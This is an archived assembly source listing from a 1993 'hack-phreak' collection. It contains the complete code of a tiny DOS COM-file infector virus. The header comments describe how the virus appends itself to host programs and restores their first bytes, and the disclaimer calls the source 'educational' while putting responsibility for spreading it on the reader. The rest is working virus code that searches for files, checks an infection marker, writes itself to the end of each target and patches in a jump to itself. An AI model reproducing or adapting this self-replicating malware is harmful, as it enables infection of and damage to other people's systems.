home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / ASM-E.ZIP / EEMVOOR2.ASM < prev    next >
Assembly Source File  |  1993-03-28  |  5KB  |  117 lines

  1. ;               The Eem-DOS 5-Voorde Virus version 2.0
  2. ;
  3. ; Smallest (101 bytes) COM file infector which works with te folowing
  4. ; principe:
  5. ;
  6. ; Before:
  7. ;    _____________________  ____________
  8. ;   [first 3 bytes of file][rest of file]
  9. ;
  10. ; After:
  11. ;    ____________  ____________  _____  _____________________
  12. ;   [jmp to virus][rest of file][virus][first 3 bytes of file]
  13. ;
  14. ; This way the virus can restore the first 3 bytes of the file so
  15. ; the file will still work.
  16. ;
  17. ; If you want no registers to change you can add some pushes, but
  18. ; it'll make the virus much larger.....
  19. ;
  20. ;       (C)1993 by [DαRkRαY] / TridenT
  21. ;
  22. ; BTW This is only a educational source, and this virus should not be
  23. ; spread, you may publish this file in it's original form.
  24. ; If you intend to spread this virus you will take all the responsibilities
  25. ; on youself so the author will not get into trubble.
  26. ; If you do not agree with this, destroy this file now.
  27. ;
  28. _CODE   SEGMENT
  29.         ASSUME  CS:_CODE
  30.  
  31.         ORG     100h
  32.  
  33.         LEN     EQU THE_END - VX                ; This bab's length
  34.  
  35. START:
  36.         DB      0E9h,0,0                        ; Jump te virus. (carrier
  37.                                                 ; program)
  38. VX:
  39.         PUSH    SI                              ; Put 100h in DI and save
  40.         PUSH    SI                              ; it as return point.
  41.         POP     DI                              ;
  42.  
  43.         CALL    RELATIVE                        ;
  44. RELATIVE:                                       ; Calculate where the old 3
  45.         POP     SI                              ; bytes are stored.
  46.         ADD     SI,(OLD_BYTES - RELATIVE)       ;
  47.  
  48.         PUSH    SI                              ; Save it for later.
  49.  
  50.         MOV     CL,3                            ; Restore the first 3 bytes.
  51.         REP     MOVSB                           ;
  52.  
  53.         MOV     DX,SI                           ; Set DX to file spec.
  54.  
  55.         POP     SI                              ; Restore SI
  56.  
  57.         DEC     AX                              ;
  58. AGAIN:  ADD     AH,4Fh                          ; Search for (next) file
  59.         INT     21h                             ; and exit if non found.
  60.         JC      EXIT                            ;
  61.  
  62.         MOV     DI,SI                           ; Put SI in DI
  63.  
  64.         MOV     AH,3Eh                          ; Close open file. (also
  65.         CALL    OPEN                            ; nice anti-debug trick!)
  66.  
  67.         MOV     AH,3Fh                          ; Read first 3 bytes.
  68.         CALL    IO                              ;
  69.  
  70.         CMP     BYTE PTR [DI],0E9h              ; Next file if first instr.
  71.         JE      AGAIN                           ; is a JMP FAR. (marker)
  72.  
  73.         MOV     AX,4202h                        ;
  74.         XOR     CX,CX                           ; Goto EOF.
  75.         CWD                                     ;
  76.         INT     21h                             ;
  77.  
  78.         SUB     AX,3                            ;
  79.         ADD     DI,8                            ; Set JMP to virus.
  80.         MOV     WORD PTR DS:[DI],AX             ;
  81.  
  82.         MOV     AH,40h                          ;
  83.         MOV     CL,LEN                          ; Write virus and open
  84.         MOV     DX,DI                           ; file again.
  85.         SUB     DX,(OLD_BYTES - VX) + 8         ;
  86.         CALL    OPEN                            ;
  87.  
  88.         DEC     DI                              ; Write JMP
  89.         MOV     AH,40h                          ;
  90. IO:
  91.         MOV     CL,3                            ;
  92.         MOV     DX,DI                           ; Read or write 3 bytes.
  93.         INT     21h                             ;
  94. EXIT:
  95.         RET                                     ; Start carrier program.
  96.  
  97. OPEN:
  98.         INT     21h                             ;
  99.         MOV     AX,3D02h                        ;
  100.         MOV     DX,9Eh                          ; Open file.
  101.         INT     21h                             ;
  102.         XCHG    BX,AX                           ;
  103.         RET
  104.  
  105. OLD_BYTES:      NOP                             ;
  106.                 NOP                             ; First 3 bytes of carrier
  107.                 RET                             ; program.
  108.  
  109. FILE_NAME:      DB      '*.*',0h                ; File to search for (all)
  110.  
  111. NEW_BYTES       DB      0E9h                    ; JMP to virus buffer.
  112.  
  113. THE_END:
  114.  
  115. _CODE   ENDS
  116.         END     START
  117.